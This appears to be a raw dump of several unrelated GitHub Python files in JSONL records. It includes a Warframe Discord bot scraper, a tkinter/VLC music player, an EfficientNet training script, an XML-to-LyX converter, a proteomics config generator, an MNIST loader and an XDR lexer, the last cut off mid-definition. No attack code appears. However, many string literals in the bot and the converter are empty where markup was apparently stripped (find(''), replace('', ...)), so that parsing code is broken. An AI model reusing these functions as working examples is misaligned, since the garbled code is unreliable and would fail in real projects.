zone.rfind(RotationLimit1, 0, pos) + len(''):zone.find(RotationLimit2,\r\n zone.rfind(\r\n RotationLimit1,\r\n 0, pos) + len(\r\n ''))]\r\n objet = zone[zone.rfind('', 0, pos) + len(\"\"):pos + len(item)] # \r\n chance = zone[zone.find('', pos) + len(\"\"):zone.find('', zone.find('',\r\n pos) + len(\r\n \"\"))] # \r\n if \"rotation\" not in Rotation:\r\n Rotation = \"???\"\r\n tab = tab + '\\n**' + Mission.capitalize() + '**\\n**' + Rotation.capitalize().replace(' b',\r\n ' B').replace(' c',\r\n ' C').replace(\r\n ' a', ' A') + '**\\n' + objet.capitalize() + '\\t' + chance\r\n if len(tab) >= 1750:\r\n return tab[:1900 ].replace('%)', \"%)\\n\") + '\\n```And more...', 'message.author'\r\n if tab == \"\" or item == \"region resource\":\r\n return Traduction.bug(item), 'msg'\r\n else:\r\n return tab.replace('%)', \"%)\\n\"), 'msg'\r\n\r\ndef typeofrelic(rarete, item):\r\n if \"axi\" in item.lower():\r\n if rarete == \"Intact\":\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/0/0e/VoidProjectionsGoldD.png/revision/latest?cb=20160711164509&path-prefix=fr'\r\n if rarete == \"Exceptional\":\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/3/3c/VoidProjectionsIronA.png/revision/latest?cb=20160903181326&path-prefix=fr'\r\n if rarete == \"Flawless\":\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/4/4e/VoidProjectionsIronB.png/revision/latest?cb=20160903181334&path-prefix=fr'\r\n if rarete == \"Radiant\":\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/1/1a/VoidProjectionsIronC.png/revision/latest?cb=20160903181342&path-prefix=fr'\r\n else:\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/0/0e/VoidProjectionsGoldD.png/revision/latest?cb=20160711164509&path-prefix=fr'\r\n if \"meso\" in item.lower():\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/1/12/VoidProjectionsBronzeD.png/revision/latest/scale-to-width-down/199?cb=20160711164431&path-prefix=fr'\r\n if \"neo\" in item.lower():\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/c/c5/VoidProjectionsSilverD.png/revision/latest/scale-to-width-down/199?cb=20160711164523&path-prefix=fr'\r\n else:\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/a/ae/VoidProjectionsIronD.png/revision/latest/scale-to-width-down/199?cb=20160711164451&path-prefix=fr'\r\n\r\n\r\ndef relicSearch(args, client):\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n item = list(' '.join(args[1:3]).lower())\r\n item[0] = item[0].upper()\r\n item[len(item) - 2] = item[len(item) - 2].upper()\r\n item = \"\".join(item)\r\n try:\r\n if args[3] == \"1\":\r\n rarete = \"Exceptional\"\r\n elif args[3] == \"2\":\r\n rarete = \"Flawless\"\r\n elif args[3] == \"3\":\r\n rarete = \"Radiant\"\r\n else:\r\n rarete = \"Intact\"\r\n except:\r\n rarete = \"Intact\"\r\n limit1 = ''\r\n tab = data_html[data_html.find(item + \" Relic (\" + rarete + \")\"):data_html.find(limit1, data_html.find(\r\n item + \" Relic (\" + rarete + \")\"))].replace(\"\", \"\\n**\").replace(\"\", \"** \").replace(\r\n \"\", \"\\n**\")\r\n embed = discord.Embed(title=\" Relic \"+item+' '+rarete, description=datetime.today().strftime(\"%d/%m/%Y\"),\r\n color=0x514430)\r\n embed.set_author(name=client.user.name, icon_url=client.user.avatar_url,\r\n url='https://discordbots.org/bot/591950764289818634')\r\n embed.set_thumbnail(url=typeofrelic(rarete, item))\r\n pos = 0\r\n for i in range(0, tab.count(\" (\")):\r\n pos = tab.find('\\n', pos) + len('\\n')\r\n Data = tab[tab.find(')', pos) + len(')'):tab.find(')', tab.find(')', pos) + len(')')) + len(')')]\r\n name = Data[Data.find('**') + len('**'):Data.find('**', Data.find('**') + len('**'))]\r\n chance = Data[Data.find('** ') + len('** '):]\r\n if len(name) > 5:\r\n embed.add_field(name=name, value=chance, inline=True)\r\n if tab == \"\":\r\n embed.add_field(name=Traduction.bug(item), value=Traduction.bug(item))\r\n return embed\r\n else:\r\n return embed\r\n\r\ndef MobsModsdrops(args):\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n zone = data_html[data_html.find(\"Mod Drops by Enemy:\"):data_html.find(\"Mod Drops by Mod:\")].lower()\r\n tab = \"**\" + zone[zone.find(item + ''):zone.find(\r\n '',\r\n zone.find(item + ''))].replace(\"\", \"\\n\").replace(\"\",\r\n \" \").replace(\r\n \"\", \"\\n\").replace('', \"\\n\").replace(item, item + \"**```fix\").replace(\r\n \"\\n \", \"\\n\").capitalize() + \"```\"\r\n if tab == \"**```\":\r\n return Traduction.bug(item)\r\n else:\r\n return tab\r\n\r\ndef ItemDrops(args):\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n zone = data_html[\r\n data_html.find(\"Blueprint/Item Drops by Blueprint/Item:\"):data_html.find(\"Resource Drops by Enemy:\")].lower()\r\n tab = '**' + zone[zone.find(item + ''):zone.find(\r\n '',\r\n zone.find(item + ''))].replace('', '**\\n__').capitalize().replace(\r\n '', '__\\t\\t__').replace('', '__\\n```diff\\n').replace('', '\\t\\t').replace(\r\n '', '\\n') + '```'\r\n if tab == \"**```\" and \"blueprint\" not in item:\r\n args.append(\"blueprint\")\r\n return ItemDrops(args)\r\n elif tab == \"**```\":\r\n return Traduction.bug(item)\r\n else:\r\n return tab\r\n\r\ndef mods(args):\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n tab = \"\"\r\n modslist = source_html('https://wf.snekw.com/mods-wiki').lower()\r\n if modslist.count(item) == 0:\r\n return Traduction.bug(item)\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n zone = data_html[data_html.find(\"Mod Drops by Mod:\"):data_html.find(\"Blueprint/Item Drops by Enemy:\")].lower()\r\n if zone.count(item) >= 1:\r\n tab = '**' + zone[zone.find(item + ''):zone.find(\r\n '',\r\n zone.find(item + ''))].replace('', '**\\n__').capitalize().replace(\r\n '', '__\\t\\t\\t__').replace('', '__\\n```diff\\n').replace('',\r\n '\\t').replace(\r\n '', '\\n') + '```\\n'\r\n data_html = source_html(\"https://drops.warframestat.us/data/all.json\").lower()\r\n if data_html.count(item) >= 1:\r\n tab = tab + '**' + item.capitalize() + '**\\n'\r\n posData = 0\r\n for i in range(0, data_html.count(item)):\r\n posData = data_html.find(item, posData + len(item))\r\n Objectivename = data_html[\r\n data_html.rfind('\"objectivename\":\"', 0, posData) + len('\"objectivename\":\"'):data_html.find(\r\n '\"', data_html.rfind('\"objectivename\":\"', 0, posData) + len('\"objectivename\":\"'))]\r\n if Objectivename == 'ds':\r\n zoneb = data_html[data_html.rfind(\"}]\", 0, posData):data_html.rfind(\":[{\", 0, posData)]\r\n MissionName = zoneb[zoneb.find('\"') + 1:zoneb.find('\"', zoneb.find('\"') + 2)]\r\n gamemode = zoneb[zoneb.find('{\"gamemode\":\"') + len('{\"gamemode\":\"'):zoneb.find('\"', zoneb.find(\r\n '{\"gamemode\":\"') + len('{\"gamemode\":\" '))]\r\n if MissionName == 'c' or MissionName == 'b' or MissionName == 'a':\r\n MissionName2=data_html[data_html.rfind('\"',0,data_html.rfind('\":{\"ga',0,posData))+1:data_html.rfind('\":{\"ga',0,posData)].capitalize()\r\n gamemode=data_html[data_html.rfind('\"gamemode\":\"',0,posData)+len('\"gamemode\":\"'):data_html.find('\"',data_html.rfind('\"gamemode\":\"',0,posData)+len('\"gamemode\":\"'))].capitalize()\r\n MissionName = 'Rotation ' + MissionName\r\n MissionName=MissionName2.capitalize()+'\\n'+MissionName\r\n Objectivename = '\\n**' + MissionName + '** : ' + gamemode.capitalize()\r\n chancedrop = data_html[data_html.find('\"chance\":', posData) + len('\"chance\":'):data_html.find('}',\r\n data_html.find(\r\n '\"chance\":',\r\n posData) + len(\r\n '\"chance\":'))]\r\n tab = tab + Traduction.FindHere() + Objectivename + '\\nDrop Chance: ' + chancedrop + '\\n'\r\n if len(tab) >= 1750:\r\n return tab[:1900 ].replace('%)', \"%)\\n\") + '\\nAnd more...', 'message.author'\r\n if not tab == \"\":\r\n return tab,\"msg\"\r\n else:\r\n return Traduction.bug(item),\"msg\"","repo_name":"typlosion14/WarframeBot","sub_path":"resources/official.py","file_name":"official.py","file_ext":"py","file_size_in_byte":16292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33574452494","text":"from tkinter import *\r\nfrom tkinter import filedialog as fd\r\nimport os\r\nimport vlc\r\nimport random\r\n\r\nInstance = vlc.Instance()\r\nplayer = Instance.media_player_new()\r\n\r\nafter_id = ''\r\n\r\nclass Music():\r\n song_name = ''\r\n random_song = False\r\n ext_list = ['.mp3', '.wav', '.ogg']\r\n player_volume = 50\r\n\r\n def change_random(self):\r\n self.random_song = not self.random_song\r\n if self.random_song: prevMusicButton['state'] = 'disabled'\r\n else: prevMusicButton['state'] = 'active'\r\n\r\n def switch_file(filepath, prev):\r\n directory = os.path.dirname(filepath)\r\n filename = os.path.basename(filepath)\r\n fileList = os.listdir(directory)\r\n if prev: nextIndex = fileList.index(filename) - 1\r\n else: nextIndex = fileList.index(filename) + 1\r\n if nextIndex == len(fileList):\r\n nextIndex = 0\r\n nextpath = directory + '/' + fileList[nextIndex]\r\n return nextpath\r\n \r\n def random_file(self, filepath):\r\n directory = os.path.dirname(filepath)\r\n filename = os.path.basename(filepath)\r\n fileList = os.listdir(directory)\r\n nextIndex = random.randint(0, len(fileList) - 1)\r\n nextpath = directory + '/' + fileList[nextIndex]\r\n if nextpath == filepath: self.random_file(self, filepath)\r\n return nextpath\r\n\r\n def start_player(self):\r\n self.stop_player()\r\n\r\n self.song_name = fd.askopenfilename(title = 'Выберите музыку')\r\n nowPlaying['text'] = os.path.basename(self.song_name)\r\n Media = Instance.media_new(self.song_name)\r\n Media.get_mrl()\r\n player.set_media(Media)\r\n player.play() \r\n player.audio_set_volume(self.player_volume) \r\n\r\n def next_song(self, prev):\r\n Music.skip_not_music(self, prev)\r\n nowPlaying['text'] = os.path.basename(self.song_name)\r\n Media = Instance.media_new(self.song_name)\r\n Media.get_mrl()\r\n player.set_media(Media)\r\n player.play() \r\n player.audio_set_volume(self.player_volume)\r\n\r\n def skip_not_music(self, prev):\r\n if self.random_song:\r\n self.song_name = self.random_file(self, self.song_name)\r\n else:\r\n self.song_name = self.switch_file(self.song_name, prev)\r\n ext = os.path.splitext(self.song_name)[-1].lower()\r\n if ext not in self.ext_list:\r\n self.next_song(self, prev)\r\n \r\n def change_volume(self, minus):\r\n if minus: \r\n if self.player_volume - 10 >= 0: self.player_volume -= 10\r\n else: self.player_volume += 10\r\n volumeLabel['text'] = \"Громкость: \" + str(self.player_volume)\r\n player.audio_set_volume(self.player_volume)\r\n\r\n def stop_player():\r\n player.stop()\r\n nowPlaying[\"text\"] = \"Сейчас ничего не играет\"\r\n\r\ngui = Tk()\r\ngui.geometry('500x250')\r\ngui.configure(background = '#333333')\r\ngui.resizable(width=True, height=False) \r\n\r\nframe_top = Frame(background = '#111111')\r\nframe_mid = Frame(background = '#555555')\r\n\r\nframe_midtop = Frame(frame_mid, background = '#555555')\r\nframe_midmid = Frame(frame_mid, background = '#555555')\r\nframe_midbot = Frame(frame_mid, background = '#555555')\r\n\r\nstartMusicButton = Button(frame_top, text = \"Включить\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#111111\",\r\n font=('Comic Sans MS', 20),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.start_player(Music)))\r\npauseMusicButton = Button(frame_midbot, text = \"▍▍\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font=20,\r\n fg = '#EEEEEE',\r\n command = lambda: (player.pause()))\r\nprevMusicButton = Button(frame_midbot, text = \"🡸\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.next_song(Music, True)))\r\nnextMusicButton = Button(frame_midbot, text = \"🡺\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.next_song(Music, False)))\r\nstopMusicButton = Button(frame_top, text = \"Выключить\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#111111\",\r\n font=('Comic Sans MS', 20),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.stop_player()))\r\nrandomCheck = Checkbutton(frame_top, text='Перемешать треки',\r\n background = \"#111111\",\r\n font=('Comic Sans MS', 10),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.change_random(Music)))\r\nvolumeScaleMinus = Button(frame_midmid, text = \"-\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n fg = '#EEEEEE',\r\n font = 20,\r\n command = lambda: (Music.change_volume(Music, True)))\r\nvolumeScalePlus= Button(frame_midmid, text = \"+\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.change_volume(Music, False)))\r\n\r\nvolumeLabel = Label(frame_midmid, background = \"#555555\", text = 'Громкость: 50', font=('Comic Sans MS', 10), fg = '#EEEEEE')\r\nnowPlaying = Label(frame_midtop, background = \"#555555\", text = 'Сейчас ничего не играет', font=('Comic Sans MS', 10), fg = '#EEEEEE', width = 200)\r\n\r\nframe_top.pack(side = 'top', fill = 'both')\r\nstartMusicButton.pack(side = 'left')\r\nstopMusicButton.pack(side = 'left')\r\nrandomCheck.pack(side = 'left')\r\n\r\nframe_mid.pack(side = 'left')\r\n\r\nframe_midtop.pack(side = 'top')\r\nnowPlaying.pack(side = 'left', fill = 'x')\r\n\r\nframe_midmid.pack(side = 'top')\r\nvolumeScaleMinus.pack(side = 'left')\r\nvolumeLabel.pack(side = 'left')\r\nvolumeScalePlus.pack(side = 'left')\r\n\r\nframe_midbot.pack(side = 'top')\r\npauseMusicButton.pack(side = 'left')\r\nprevMusicButton.pack(side = 'left')\r\nnextMusicButton.pack(side = 'left')\r\n\r\ngui.mainloop()","repo_name":"CharaFour/Dont-open","sub_path":"opmain.py","file_name":"opmain.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8135969840","text":"import numpy as np\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, Input, MaxPooling2D, LeakyReLU, Softmax, GlobalAveragePooling2D, BatchNormalization, Dropout \r\nfrom tensorflow.keras.models import Sequential, Model, load_model, save_model\r\nfrom tensorflow.keras.optimizers import Adam\r\nimport pandas as pd\r\n#1. DATA\r\n#.npy Load\r\nx = np.load('../../data/npy/LPD_train_x1.npy', allow_pickle=True)\r\ny = np.load('../../data/npy/LPD_train_y1.npy', allow_pickle=True)\r\ntarget = np.load('../../data/npy/target1.npy', allow_pickle=True)\r\n\r\nfrom tensorflow.keras.applications.efficientnet import preprocess_input\r\nx = preprocess_input(x)\r\ntarget = preprocess_input(target)\r\n\r\n# print(x.shape)\r\n# print(y.shape)\r\n# print(target.shape)\r\n\r\n#generagtor\r\nidg = ImageDataGenerator(\r\n zoom_range = 0.1,\r\n height_shift_range=0.1,\r\n width_shift_range=0.1,\r\n rotation_range=32 \r\n)\r\n\r\nidg2 = ImageDataGenerator()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_val, y_train, y_val = train_test_split(x, y, train_size = 0.9, random_state = 128, shuffle = True)\r\n\r\n#control\r\nimage_size = (128, 128, 3)\r\nbts = 32\r\noptimizer = Adam(learning_rate = 1e-3)\r\n\r\ntrain_generator = idg.flow(x_train, y_train, batch_size = bts, seed=1024)\r\nvalid_generator = idg2.flow(x_val, y_val)\r\ntest_generator = idg2.flow(target)\r\n\r\n#2. MODEL\r\nfrom tensorflow.keras.applications import EfficientNetB5\r\nTF = EfficientNetB5(weights=\"imagenet\", include_top=False, input_shape = image_size) \r\nTF.trainable = True\r\nx = TF.output\r\nx = GlobalAveragePooling2D()(x)\r\nx = Flatten()(x)\r\nx = Dense(2048, activation='relu')(x)\r\noutputs = Dense(1000, activation='softmax')(x)\r\nmodel = Model(inputs = TF.input, outputs = outputs)\r\nmodel.summary()\r\n\r\n#COMPILE \r\nfrom tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\r\nmodel.compile(loss = 'categorical_crossentropy', optimizer = optimizer, metrics = ['acc'])\r\nmc = ModelCheckpoint('C:/data/MC/best_LT_vision2_{epoch:02d}-{val_loss:.4f}.hdf5', save_best_only=True, mode = 'auto')\r\nes = EarlyStopping(monitor='val_loss', patience=5, verbose=1, mode='auto')\r\nrl = ReduceLROnPlateau(monitor='val_loss', factor=0.3, patience=3, verbose=1, mode='auto')\r\nmodel.fit_generator(train_generator, epochs=100, verbose=1, validation_data= valid_generator, callbacks=[es, rl, mc])\r\n\r\nmodel.save('C:/data/h5/LT_vision_model2_3.h5')\r\nmodel.save_weights('C:/data/h5/LT_vision_3.h5')\r\n# model = load_model('C:/data/h5/fish_model2.h5')\r\n# model.load_weights('C:/data/h5/fish_weight.h5')\r\n\r\n#EVAL\r\nloss, acc = model.evaluate(valid_generator)\r\nprint(\"loss : \", loss)\r\nprint(\"acc : \", acc)\r\n\r\nresult = pd.read_csv(\"C:/data/LPD_competition/sample.csv\")\r\n\r\n# prd = model.predict(x_test)\r\n# filenames = xy_test.filenames\r\n# nb_samples = len(filenames)\r\n# print(nb_samples)\r\nprd = model.predict_generator(test_generator, steps=72000)\r\na = pd.DataFrame()\r\nprd = pd.Series(np.argmax(prd,axis=-1))\r\nprd = pd.concat([a,prd],axis=1)\r\nresult.iloc[:,1] = prd.sort_index().values\r\nresult.to_csv('C:/data/LPD_competition/sample_2.csv')","repo_name":"TaeYeon-kim-ai/STUDY_1.py","sub_path":"dacon/lotte_vision_1/LT_model10_Effition_B5.py","file_name":"LT_model10_Effition_B5.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71246478122","text":"#! /usr/bin/env python\n\nimport re\nimport sys\n\nimport xml.etree.ElementTree as ET\nimport xml.parsers.expat as expat\n\ndoc = sys.argv[1]\nlang = sys.argv[2]\ninput_filename = '/extra_disk/landwijzer_werkstuk/text/'+doc+'-'+lang+'.xml'\noutput_filename = '/extra_disk/landwijzer_werkstuk/text/'+doc+'-'+lang+'-back.lyx'\n\nsentence_end_re=re.compile('([!?]|[^.][.]|[\\n])')\nheader = False\ntext = ''\ndef write_sentence(s):\n max_len = 78\n while len(s) > max_len:\n split = s.rfind(' ', 0, max_len)\n if split >= 0:\n output_file.write(s[:split]+'\\n')\n s = s[split:]\n else:\n break\n output_file.write(s.rstrip('\\n')+'\\n')\ndef write_text():\n global text\n if len(text) > 0:\n # split on end of sentences\n splitted = sentence_end_re.split(text.rstrip('\\n'))\n while len(splitted) > 1:\n sentence = splitted[0]+splitted[1]\n write_sentence(sentence)\n splitted = splitted[2:]\n if len(splitted) == 1:\n if splitted[0] != '':\n write_sentence(splitted[0])\n text = ''\ndef comment(data):\n write_text()\n\n output_file.write('#'+data+'\\n')\ndef start_element(name, attrs):\n global header\n write_text()\n\n # special tags\n if name == 'lyx2xml':\n return\n if name == 'empty_line':\n output_file.write('\\n')\n return\n if name == '__param':\n start_tab = attrs.pop('start_tab')\n if start_tab == \"True\":\n output_file.write('\\t')\n value_present = attrs.pop('value_present')\n if value_present == \"True\":\n param = ' '.join([k+' '+v for (k, v) in attrs.items()])\n else:\n param = ' '.join([k for k in attrs.keys()])\n output_file.write(param+'\\n')\n return\n\n # xml-like structure\n if name.startswith('__'):\n if len(attrs) > 0:\n param = ' '.join([k+'=\"'+v+'\"' for (k, v) in attrs.items()])\n output_file.write('<'+name[2:]+' '+param+'>\\n')\n else:\n output_file.write('<'+name[2:]+'>\\n')\n return\n\n # lyx blocks\n if name.startswith('_'):\n if name == '_ert_inset':\n name = '_inset'\n if name == '_header':\n header = True\n output_file.write('\\\\begin'+name)\n else:\n output_file.write('\\\\'+name)\n if len(attrs) > 0:\n output_file.write(' '+' '.join(attrs.values())+'\\n')\n else:\n output_file.write('\\n')\ndef end_element(name):\n global header\n write_text()\n\n # special tags\n if name == '__param':\n return\n\n # xml-like structure\n if name.startswith('__'):\n if name[2:] not in ('features', 'column'):\n output_file.write('\\n')\n return\n\n # lyx blocks\n if name.startswith('_'):\n if name == '_ert_inset':\n name = '_inset'\n if name == '_header':\n header = False\n output_file.write('\\\\end'+name+'\\n')\ndef char_data(data):\n global text\n global header\n if header is True:\n output_file.write(data.replace('',''))\n return\n\n if len(text) == 0:\n if data == '\\n':\n return\n text += data.replace('','')\n\nwith open(output_filename, 'w') as output_file:\n p = expat.ParserCreate()\n\n p.CommentHandler = comment\n p.StartElementHandler = start_element\n p.EndElementHandler = end_element\n p.CharacterDataHandler = char_data\n \n with open(input_filename, 'rb') as input_file:\n p.ParseFile(input_file)\n","repo_name":"EricSeynaeve/landwijzer_werkstuk","sub_path":"bin/xml2lyx.py","file_name":"xml2lyx.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"952276593","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport re\nimport stat\n\nusage_mesg = 'Usage: prepare-tandemK-high.py '\n\nmzXML_dir = sys.argv[1]\nfilename_fasta_pro = sys.argv[2]\ndb_name = re.sub('.pro$','', os.path.basename(filename_fasta_pro))\ndb_name = re.sub('.fasta$','',db_name)\ndb_name = re.sub('.fa$','',db_name)\n\nabs_path_script = os.path.abspath(__file__)\nMSTB_HOME = os.path.abspath( os.path.join(abs_path_script, '..', '..') )\n\nfilename_taxon_xml = 'tandem-taxonomy.xml'\nfilename_taxon_tmpl = os.path.join(MSTB_HOME,'search','tmpl',filename_taxon_xml)\n\nfilename_tandem_xml = 'tandemK.low.xml'\nfilename_in_tmpl = os.path.join(MSTB_HOME,'search','tmpl',filename_tandem_xml)\n\nfilename_sh = 'run-tandemK.sh'\nfilename_tandem_exe = os.path.join(MSTB_HOME,'extern','tandem.linux.exe') \nfilename_default_xml = os.path.join(MSTB_HOME,'search','isb_default_input_kscore.xml')\n\nf_taxon_tmpl = open(filename_taxon_tmpl,'r')\ntaxon_tmpl = ''.join( f_taxon_tmpl.readlines() )\nf_taxon_tmpl.close()\n\nsys.stderr.write('Write %s.\\n'%filename_taxon_xml)\nf_taxon = open(filename_taxon_xml,'w')\nf_taxon.write( taxon_tmpl.format(DB_FASTAPRO=filename_fasta_pro, DB_NAME=db_name) )\nf_taxon.close()\n\nf_in_tmpl = open(filename_in_tmpl,'r')\nin_tmpl = ''.join( f_in_tmpl.readlines() )\nf_in_tmpl.close()\n\nf_sh = open(filename_sh,'w')\nf_sh.write('#!/bin/bash\\n')\nfor filename in os.listdir(mzXML_dir):\n if( not filename.upper().endswith('.MZXML') ):\n continue\n filename_base = '.'.join(filename.split('.')[:-1])\n filename_in = '%s.%s.tandemK.xml'%(filename_base,db_name)\n\n in_params = dict()\n in_params['DB_NAME'] = db_name\n in_params['TANDEMK_DEFAULT_PARAM'] = filename_default_xml\n in_params['FILENAME_TAXON'] = filename_taxon_xml\n in_params['FILENAME_MZXML'] = os.path.abspath(os.path.join(mzXML_dir, filename))\n filename_out = '%s.%s.tandemK.out'%(filename_base,db_name)\n in_params['FILENAME_OUT'] = filename_out\n in_params['FILENAME_LOG'] = '%s.%s.tandemK.log'%(filename_base,db_name)\n\n sys.stderr.write('Write %s.\\n'%filename_in)\n f_in = open(filename_in,'w')\n f_in.write( in_tmpl.format(**in_params) )\n f_in.close()\n \n f_sh.write(\"%s %s\\n\"%(filename_tandem_exe, filename_in))\nf_sh.close()\n\nos.chmod(filename_sh,stat.S_IRWXU)\nsys.stderr.write('\\nTandemK is ready. Run %s.\\n\\n'%(filename_sh))\n","repo_name":"marcottelab/MSblender","sub_path":"msblender-scripts/prepare-tandemK-low.py","file_name":"prepare-tandemK-low.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"22187868104","text":"\"\"\"MNIST dataset generation and dataloader\r\n\"\"\"\r\n\r\nimport torch\r\nimport torchvision\r\nimport numpy as np\r\nfrom .utils_dataset import TransformsDataset\r\n\r\nclass ToBinary(object):\r\n def __init__(self, class_0):\r\n self.class_0 = class_0\r\n \r\n def __call__(self, label):\r\n return np.float32([not (label == self.class_0)])\r\n \r\n def __repr__(self):\r\n return self.__class__.__name__ + '()'\r\n\r\nclass Subset(torch.utils.data.sampler.SubsetRandomSampler):\r\n def __iter__(self):\r\n return (self.indices[i] for i in range(len(self.indices)))\r\n \r\ndef get_dataloaders(opt, mode):\r\n mode_ = 'train' if mode=='train' else opt.split_validation\r\n mnist_dataset = torchvision.datasets.MNIST('./', train=mode_!='test', download=True,\r\n transform=torchvision.transforms.Compose([\r\n torchvision.transforms.ToTensor(),\r\n torchvision.transforms.Normalize(\r\n (0.5,), (0.5,))\r\n ]))\r\n \r\n valid_size = 0.1\r\n num_train = len(mnist_dataset)\r\n indices = []\r\n \r\n # only using the two selected classes\r\n for i in range(len(mnist_dataset)):\r\n if mnist_dataset[i][1] in [opt.class_0_mnist, opt.class_1_mnist]:\r\n indices.append(i)\r\n \r\n if mode_!='test':\r\n valid_size = 0.1\r\n num_train = len(indices)\r\n split = int(valid_size * num_train)\r\n # get a fixed random validation set for every run\r\n np.random.RandomState(0).shuffle(indices)\r\n indices = {'train':indices[split:], 'val':indices[:split]}[mode_]\r\n \r\n mnist_dataset = TransformsDataset(mnist_dataset, ToBinary(opt.class_0_mnist), i=1)\r\n if mode=='train':\r\n sampler = torch.utils.data.sampler.SubsetRandomSampler\r\n else:\r\n sampler = Subset\r\n \r\n return torch.utils.data.DataLoader(mnist_dataset, \r\n batch_size=opt.batch_size, sampler=sampler(indices), num_workers=0)","repo_name":"ricbl/gradient-direction-of-robust-models","sub_path":"src/direct_method/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8504655862","text":"from django.urls import path\n\nfrom advanced_report_builder.views.datatables import TableModal, FieldModal\n\napp_name = 'report_builder'\n\n\nurlpatterns = [\n path('table/modal//', TableModal.as_view(), name='table_modal'),\n path('table/modal/field//', FieldModal.as_view(), name='field_modal'),\n]\n","repo_name":"nagwagabr74/plots","sub_path":"env/Lib/site-packages/advanced_report_builder/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1409189138","text":"# SPDX-License-Identifier: LGPL-2.1-or-later\n\nimport abc\n\n\nclass XDRReader:\n def __init__(self, fp):\n self.fp = fp\n self.lookahead = \"\"\n self.lookbehind = \"\"\n self.line = 1\n self.column = 0\n\n def _read(self):\n if len(self.lookahead) > 0:\n c = self.lookahead[0:1]\n self.lookahead = self.lookahead[1:]\n return c\n return self.fp.read(1)\n\n def peek(self, skip=0):\n need = 1 + skip\n if len(self.lookahead) < need:\n self.lookahead = self.lookahead + self.fp.read(need - len(self.lookahead))\n if len(self.lookahead) < need:\n return None\n\n return self.lookahead[skip : skip + 1]\n\n def last(self, skip=0):\n if (skip + 1) > len(self.lookbehind):\n return None\n return self.lookbehind[skip]\n\n def next(self):\n c = self._read()\n line = self.line\n column = self.column\n if c == \"\\n\":\n self.line = self.line + 1\n self.column = 0\n else:\n self.column = self.column + 1\n self.lookbehind = c + self.lookbehind\n if len(self.lookbehind) > 2:\n self.lookbehind = self.lookbehind[0:2]\n return c, line, column\n\n\nclass XDRToken(abc.ABC):\n def __init__(self, line, column, value):\n self.line = line\n self.column = column\n self.value = value\n\n def __eq__(self, other):\n return (\n type(self) is type(other)\n and self.line == other.line\n and self.column == other.column\n and self.value == other.value\n )\n\n @classmethod\n @abc.abstractmethod\n def start(cls, reader):\n pass\n\n @classmethod\n @abc.abstractmethod\n def end(cls, reader):\n pass\n\n @classmethod\n def consume(cls, reader):\n c, line, col = reader.next()\n buf = c\n while True:\n if cls.end(reader):\n break\n c, _, _ = reader.next()\n buf = buf + c\n return cls(line, col, buf)\n\n def __repr__(self):\n return \"%s{line=%d,col=%d,value={{{%s}}}}\" % (\n self.__class__.__name__,\n self.line,\n self.column,\n self.value,\n )\n\n\nclass XDRTokenComment(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.peek() == \"/\" and reader.peek(skip=1) == \"*\"\n\n @classmethod\n def end(cls, reader):\n c1 = reader.last(skip=1)\n c2 = reader.last()\n if c1 == \"*\" and c2 == \"/\":\n return True\n\n if reader.peek() is None:\n raise Exception(\n \"EOF before closing comment starting at %d:%d\"\n % (reader.line, reader.column)\n )\n\n\nclass XDRTokenIdentifier(XDRToken):\n @classmethod\n def start(cls, reader):\n c = reader.peek()\n return c.isalpha()\n\n @classmethod\n def 